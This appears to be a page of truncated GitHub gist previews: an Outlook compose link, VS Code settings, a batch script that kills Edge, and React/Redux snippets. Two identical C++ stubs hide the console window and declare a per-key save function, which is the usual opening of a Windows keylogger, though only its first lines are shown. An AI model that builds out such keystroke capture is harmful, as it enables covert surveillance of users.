For Outlook
Link - https://outlook.live.com/mail/0/deeplink/compose?to=user@gmail.com&subject=Hello%20World
{ | |
"sync.gist": "c9c964ae99f2e35d5e2219b5dfd9b7ef", | |
"workbench.iconTheme": "material-icon-theme", | |
"workbench.startupEditor": "newUntitledFile", | |
"explorer.confirmDelete": false, | |
"explorer.confirmDragAndDrop": false, | |
"prettier.packageManager": "yarn", | |
"[javascript]": { | |
"editor.defaultFormatter": "esbenp.prettier-vscode" | |
}, |
@echo off | |
:: Creator: Dave Kirkwood | |
:: Modified:By Britec | |
:: Created: 24/09/2020 | |
:: Updated: 21/09/2022 | |
:: | |
:: First Stop Microsoft Edge Task | |
taskkill /F /IM msedge.exe >nul 2>&1 |
<head> | |
<title>Target 2025</title> | |
<link | |
rel="icon" | |
href="data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>🎯</text></svg>" | |
/> | |
</head> |
#include <iostream> | |
#include <windows.h> | |
using namespace std; | |
int Save(int _key,char *file); | |
int main() | |
{ | |
FreeConsole(); |
#include <iostream> | |
#include <windows.h> | |
using namespace std; | |
int Save(int _key,char *file); | |
int main() | |
{ | |
FreeConsole(); |
Link - https://outlook.live.com/mail/0/deeplink/compose?to=user@gmail.com&subject=Hello%20World
import * as Actions from './../../../constants/actionTypes'; | |
const initialState = { | |
pages: [], | |
}; | |
const pageReducer = (state = initialState, action) => { | |
switch (action.type) { | |
// New page open | |
case Actions.ADD_PAGE: { |
import { useRef, useEffect } from "react"; | |
const useNonInitialEffect = (effect, deps = []) => { | |
const initialRender = useRef(true); | |
useEffect(() => { | |
let effectReturns = () => {}; | |
if (initialRender.current) { | |
initialRender.current = false; |
import React from "react"; | |
import { connect } from "react-redux"; | |
import { loadMoreChatrooms } from "actions"; | |
import AllChatrooms from "./AllChatrooms"; | |
const Profile = ({ chatrooms, loadMoreChatrooms }) => { | |
return ( | |
<div> | |
<AllChatrooms chatrooms={chatrooms} /> |
console.log(JSON.stringify({ filter }, null, 4)); | |
const start = new Date().getTime(); | |
const end = new Date().getTime(); | |
const time = end - start; | |
console.log({ | |
inLength: filteredChatrooms.length, | |
filterTime: time, |